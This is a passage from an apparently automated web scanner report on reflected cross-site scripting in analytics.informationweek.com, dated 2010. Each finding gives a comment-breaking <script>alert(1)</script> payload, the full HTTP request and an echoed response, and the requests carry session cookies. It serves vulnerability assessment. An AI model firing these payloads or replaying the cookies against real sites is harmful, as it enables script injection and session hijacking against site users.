HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:31 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:31 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... F19aea57--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E9b59d6056e2%2FNetwork-infrastructure%2FNetwork-infrastructure.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/19aea57--><script>alert(1)</script>9b59d6056e2/Network-infrastructure/Network-infrastructure.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 962ea--><script>alert(1)</script>d1972443112 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/19/Network-infrastructure962ea--><script>alert(1)</script>d1972443112/Network-infrastructure.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:38 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:38 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... cture962ea--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed1972443112%2FNetwork-infrastructure.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/19/Network-infrastructure962ea--><script>alert(1)</script>d1972443112/Network-infrastructure.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 40573--><script>alert(1)</script>b96df8e6712 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/19/Network-infrastructure/Network-infrastructure.html40573--><script>alert(1)</script>b96df8e6712 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:48 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:48 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... re.html40573--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb96df8e6712&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/19/Network-infrastructure/Network-infrastructure.html40573--><script>alert(1)</script>b96df8e6712"> ...[SNIP]...
3.90. http://analytics.informationweek.com/menu/19/Network-infrastructure/Network-infrastructure.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4df2a--><script>alert(1)</script>bb132b834aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/19/Network-infrastructure/Network-infrastructure.html?4df2a--><script>alert(1)</script>bb132b834aa=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 3F4df2a--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebb132b834aa%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/19/Network-infrastructure/Network-infrastructure.html?4df2a--><script>alert(1)</script>bb132b834aa=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload fa9da--><script>alert(1)</script>6bac0ed8397 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menufa9da--><script>alert(1)</script>6bac0ed8397/2/Business-continuity/Business-continuity.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:16 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:17 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45941
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... m%2Fmenufa9da--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6bac0ed8397%2F2%2FBusiness-continuity%2FBusiness-continuity.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menufa9da--><script>alert(1)</script>6bac0ed8397/2/Business-continuity/Business-continuity.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload fcfd3--><script>alert(1)</script>e7060e8fad5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/2fcfd3--><script>alert(1)</script>e7060e8fad5/Business-continuity/Business-continuity.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:30 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:31 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45941
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 2Fmenu%2F2fcfd3--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee7060e8fad5%2FBusiness-continuity%2FBusiness-continuity.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/2fcfd3--><script>alert(1)</script>e7060e8fad5/Business-continuity/Business-continuity.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 9ca2d--><script>alert(1)</script>e052c9eff64 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/2/Business-continuity9ca2d--><script>alert(1)</script>e052c9eff64/Business-continuity.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:52 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:52 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45941
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... s-continuity9ca2d--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee052c9eff64%2FBusiness-continuity.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/2/Business-continuity9ca2d--><script>alert(1)</script>e052c9eff64/Business-continuity.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 75b36--><script>alert(1)</script>06300418583 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/2/Business-continuity/Business-continuity.html75b36--><script>alert(1)</script>06300418583 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:42:05 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:42:05 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45941
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ontinuity.html75b36--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E06300418583&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/2/Business-continuity/Business-continuity.html75b36--><script>alert(1)</script>06300418583"> ...[SNIP]...
3.95. http://analytics.informationweek.com/menu/2/Business-continuity/Business-continuity.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 2e793--><script>alert(1)</script>2cc393b4e14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/2/Business-continuity/Business-continuity.html?2e793--><script>alert(1)</script>2cc393b4e14=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... y.html%3F2e793--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2cc393b4e14%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/2/Business-continuity/Business-continuity.html?2e793--><script>alert(1)</script>2cc393b4e14=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 9f503--><script>alert(1)</script>6ba192a2efa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu9f503--><script>alert(1)</script>6ba192a2efa/20/Network-and-systems-management/Network-systems-management.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:01 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:01 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45979
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 3Cscript%3Ealert%281%29%3C%2Fscript%3E6ba192a2efa%2F20%2FNetwork-and-systems-management%2FNetwork-systems-management.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu9f503--><script>alert(1)</script>6ba192a2efa/20/Network-and-systems-management/Network-systems-management.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 2af97--><script>alert(1)</script>2b34991a0a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/202af97--><script>alert(1)</script>2b34991a0a3/Network-and-systems-management/Network-systems-management.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:15 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:15 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45979
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2b34991a0a3%2FNetwork-and-systems-management%2FNetwork-systems-management.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/202af97--><script>alert(1)</script>2b34991a0a3/Network-and-systems-management/Network-systems-management.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 49eb2--><script>alert(1)</script>3dbbea7fb8e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/20/Network-and-systems-management49eb2--><script>alert(1)</script>3dbbea7fb8e/Network-systems-manag